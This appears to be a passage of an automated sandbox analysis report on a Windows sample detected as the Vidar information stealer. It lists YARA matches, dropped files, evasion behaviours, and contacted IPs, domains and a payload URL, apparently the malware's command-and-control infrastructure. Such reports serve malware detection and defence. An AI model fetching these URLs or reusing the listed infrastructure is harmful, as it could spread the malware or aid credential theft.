Source: Yara match File source: 0000001B.00000002.3246728822.0000000000041000.00000080.00000001.01000000.00000012.sdmp, type: MEMORY
Source: Yara match File source: 0000001A.00000002.3198812078.0000000000811000.00000040.00000001.01000000.0000000A.sdmp, type: MEMORY
Source: Yara match File source: 00000020.00000002.3294064739.0000000001447000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001B.00000002.3248429652.0000000000B6E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001A.00000002.3201845149.000000000167B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000020.00000002.3286511778.0000000000041000.00000080.00000001.01000000.00000012.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.3168952289.000000000140E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001A.00000003.3018637776.00000000052A0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000020.00000000.3150281953.0000000000041000.00000080.00000001.01000000.00000012.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: 7e96f85771.exe PID: 1672, type: MEMORYSTR
Source: Yara match File source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\num[1].exe, type: DROPPED
Source: Yara match File source: C:\Users\user\AppData\Local\Temp\1001137001\num.exe, type: DROPPED
Source: Yara match File source: dump.pcap, type: PCAP
Yara detected Vidar stealer
Source: Yara match File source: 00000008.00000002.3168952289.000000000140E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: 7e96f85771.exe PID: 1672, type: MEMORYSTR
windows-stand
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1540827 Sample: g4Cyr2T5jq.exe Startdate: 24/10/2024 Architecture: WINDOWS Score: 100 95 studennotediw.store 2->95 97 steamcommunity.com 2->97 99 30 other IPs or domains 2->99 117 Suricata IDS alerts for network traffic 2->117 119 Found malware configuration 2->119 121 Antivirus detection for URL or domain 2->121 123 17 other signatures 2->123 9 skotes.exe 4 25 2->9         started        14 g4Cyr2T5jq.exe 5 2->14         started        16 skotes.exe 2->16         started        18 7 other processes 2->18 signatures3 process4 dnsIp5 113 185.215.113.43, 60964, 60978, 61008 WHOLESALECONNECTIONSNL Portugal 9->113 115 185.215.113.16, 60982, 61010, 61015 WHOLESALECONNECTIONSNL Portugal 9->115 83 C:\Users\user\AppData\Local\Temp\...\num.exe, PE32 9->83 dropped 85 C:\Users\user\AppData\...\88edf6a100.exe, PE32 9->85 dropped 87 C:\Users\user\AppData\...\7e96f85771.exe, PE32 9->87 dropped 93 5 other malicious files 9->93 dropped 147 Creates multiple autostart registry keys 9->147 149 Hides threads from debuggers 9->149 151 Tries to detect sandboxes / dynamic malware analysis system (registry check) 9->151 20 7e96f85771.exe 34 9->20         started        25 f84005b97f.exe 9->25         started        27 88edf6a100.exe 9->27         started        29 num.exe 9->29         started        89 C:\Users\user\AppData\Local\...\skotes.exe, PE32 14->89 dropped 91 C:\Users\user\...\skotes.exe:Zone.Identifier, ASCII 14->91 dropped 153 Detected unpacking (changes PE section rights) 14->153 155 Tries to evade debugger and weak emulator (self modifying code) 14->155 157 Tries to detect virtualization through RDTSC time measurements 14->157 31 skotes.exe 14->31         started        159 Tries to detect process monitoring tools (Task Manager, Process Explorer etc.) 16->159 161 Binary is likely a compiled AutoIt script file 18->161 33 firefox.exe 18->33         started        35 firefox.exe 18->35         started        37 taskkill.exe 18->37         started        39 4 other processes 18->39 file6 signatures7 process8 dnsIp9 101 185.215.113.37, 61014, 80 WHOLESALECONNECTIONSNL Portugal 20->101 71 C:\Users\user\AppData\...\softokn3[1].dll, PE32 20->71 dropped 73 C:\Users\user\AppData\Local\...\nss3[1].dll, PE32 20->73 dropped 75 C:\Users\user\AppData\...\mozglue[1].dll, PE32 20->75 dropped 81 9 other files (5 malicious) 20->81 dropped 125 Antivirus detection for dropped file 20->125 127 Multi AV Scanner detection for dropped file 20->127 129 Detected unpacking (changes PE section rights) 20->129 145 6 other signatures 20->145 103 sergei-esenin.com 104.21.53.8, 443, 61011, 61012 CLOUDFLARENETUS United States 25->103 105 steamcommunity.com 104.102.49.254, 443, 61009, 61016 AKAMAI-ASUS United States 25->105 131 Tries to detect sandboxes and other dynamic analysis tools (window names) 25->131 133 Machine Learning detection for dropped file 25->133 135 Tries to evade debugger and weak emulator (self modifying code) 25->135 137 Binary is likely a compiled AutoIt script file 27->137 41 taskkill.exe 27->41         started        43 taskkill.exe 27->43         started        45 taskkill.exe 27->45         started        55 3 other processes 27->55 139 Hides threads from debuggers 31->139 141 Tries to detect sandboxes / dynamic malware analysis system (registry check) 31->141 143 Tries to detect process monitoring tools (Task Manager, Process Explorer etc.) 31->143 107 youtube.com 142.250.184.238, 443, 61029, 61030 GOOGLEUS United States 33->107 109 prod.detectportal.prod.cloudops.mozgcp.net 34.107.221.82, 61031, 61034, 61041 GOOGLEUS United States 33->109 111 5 other IPs or domains 33->111 77 C:\Users\user\AppData\...\places.sqlite-wal, SQLite 33->77 dropped 79 C:\Users\user\AppData\...\places.sqlite-shm, data 33->79 dropped 47 firefox.exe 33->47         started        49 firefox.exe 33->49         started        51 firefox.exe 35->51         started        53 conhost.exe 37->53         started        57 4 other processes 39->57 file10 signatures11 process12 process13 59 conhost.exe 41->59         started        61 conhost.exe 43->61         started        63 conhost.exe 45->63         started        65 firefox.exe 51->65         started        67 conhost.exe 55->67         started        69 conhost.exe 55->69         started       
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
185.215.113.43
 unknown Portugal
206894 WHOLESALECONNECTIONSNL true
104.21.53.8
 sergei-esenin.com United States
13335 CLOUDFLARENETUS true
185.215.113.37
 unknown Portugal
206894 WHOLESALECONNECTIONSNL true
185.215.113.16
 unknown Portugal
206894 WHOLESALECONNECTIONSNL false
34.107.221.82
 prod.detectportal.prod.cloudops.mozgcp.net United States
15169 GOOGLEUS false
35.244.181.201
 prod.balrog.prod.cloudops.mozgcp.net United States
15169 GOOGLEUS false
34.117.188.166
 contile.services.mozilla.com United States
139070 GOOGLE-AS-APGoogleAsiaPacificPteLtdSG false
104.102.49.254
 steamcommunity.com United States
16625 AKAMAI-ASUS true
35.190.72.216
 prod.classify-client.prod.webservices.mozgcp.net United States
15169 GOOGLEUS false
142.250.184.238
 youtube.com United States
15169 GOOGLEUS false
34.160.144.191
 prod.content-signature-chains.prod.webservices.mozgcp.net United States
2686 ATGS-MMD-ASUS false

Private

IP
127.0.0.1

Contacted Domains

Name IP Active
example.org 93.184.215.14 true
prod.classify-client.prod.webservices.mozgcp.net 35.190.72.216 true
prod.balrog.prod.cloudops.mozgcp.net 35.244.181.201 true
prod.detectportal.prod.cloudops.mozgcp.net 34.107.221.82 true
sergei-esenin.com 104.21.53.8 true
prod.remote-settings.prod.webservices.mozgcp.net 34.149.100.209 true
contile.services.mozilla.com 34.117.188.166 true
youtube.com 142.250.184.238 true
prod.content-signature-chains.prod.webservices.mozgcp.net 34.160.144.191 true
steamcommunity.com 104.102.49.254 true
us-west1.prod.sumo.prod.webservices.mozgcp.net 34.149.128.2 true
ipv4only.arpa 192.0.0.170 true
prod.ads.prod.webservices.mozgcp.net 34.117.188.166 true
push.services.mozilla.com 34.107.243.93 true
telemetry-incoming.r53-2.services.mozilla.com 34.120.208.123 true
spirittunek.store unknown unknown
spocs.getpocket.com unknown unknown
licendfilteo.site unknown unknown
content-signature-2.cdn.mozilla.net unknown unknown
support.mozilla.org unknown unknown
eaglepawnoy.store unknown unknown
firefox.settings.services.mozilla.com unknown unknown
bathdoomgaz.store unknown unknown
detectportal.firefox.com unknown unknown
studennotediw.store unknown unknown
mobbipenju.store unknown unknown
shavar.services.mozilla.com unknown unknown
clearancek.site unknown unknown
dissapoiznw.store unknown unknown

Contacted URLs

Name Malicious Antivirus Detection Reputation
http://185.215.113.37/0d60be0de163924d/nss3.dll true
  • URL Reputation: malware
 unknown
https://steamcommunity.com/profiles/76561199724331900 true
    		unknown